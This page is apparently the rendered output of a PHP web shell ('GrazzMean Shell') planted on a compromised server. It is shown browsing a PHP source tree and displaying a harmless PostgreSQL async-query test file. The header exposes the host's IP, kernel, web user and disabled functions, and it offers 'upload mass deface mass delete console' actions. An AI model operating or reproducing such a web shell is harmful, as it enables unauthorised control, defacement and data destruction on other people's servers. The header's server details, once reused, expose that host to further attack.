shell bypass 403

GrazzMean Shell

: /proc/self/root/www/server/php/72/src/ext/pgsql/tests/ [ drwxrwxr-x ]
Uname: Linux yisu-647059427c03a 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Software: nginx/1.22.1
PHP version: 7.3.31 [ PHP INFO ] PHP os: Linux
Server Ip: 103.146.158.90
Your Ip: 216.73.216.141
User: www (1000) | Group: www (1000)
Safe Mode: OFF
Disable Function:
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
upload mass deface mass delete console

name : 25async_query_params.phpt 
--TEST--
PostgreSQL async query params
--SKIPIF--
<?php
include("skipif.inc");
if (!function_exists('pg_send_query_params')) die('skip function pg_send_query_params() does not exist');
?>
--FILE--
<?php

include('config.inc');

$db = pg_connect($conn_str);

$version = pg_version($db);
if ($version['protocol'] >= 3) {
	if (!pg_send_query_params($db, "SELECT * FROM ".$table_name." WHERE num > \$1;", array(100))) {
		echo "pg_send_query_params() error\n";
	}
	while(pg_connection_busy($db));  // busy wait: intended
	if (pg_connection_status($db) === PGSQL_CONNECTION_BAD) {
		echo "pg_connection_status() error\n";
	}
	if (!($result = pg_get_result($db)))
	{
		echo "pg_get_result() error\n";
	}
	if (!($rows = pg_num_rows($result))) {
		echo "pg_num_rows() error\n";
	}
	for ($i=0; $i < $rows; $i++)
	{
		pg_fetch_array($result, $i, PGSQL_NUM);
	}
	for ($i=0; $i < $rows; $i++)
	{
		pg_fetch_object($result);
	}
	for ($i=0; $i < $rows; $i++)
	{
		pg_fetch_row($result, $i);
	}
	for ($i=0; $i < $rows; $i++)
	{
		pg_fetch_result($result, $i, 0);
	}

	pg_num_rows(pg_query_params($db, "SELECT * FROM ".$table_name." WHERE num > \$1;", array(100)));
	pg_num_fields(pg_query_params($db, "SELECT * FROM ".$table_name." WHERE num > \$1;", array(100)));
	pg_field_name($result, 0);
	pg_field_num($result, $field_name);
	pg_field_size($result, 0);
	pg_field_type($result, 0);
	pg_field_prtlen($result, 0);
	pg_field_is_null($result, 0);

	if (!pg_send_query_params($db, "INSERT INTO ".$table_name." VALUES (\$1, \$2);", array(9999, "A'BC")))
	{
		echo "pg_send_query_params() error\n";
	}

	pg_last_oid($result);
	pg_free_result($result);
}
pg_close($db);

echo "OK";
?>
--EXPECT--
OK
© 2026 GrazzMean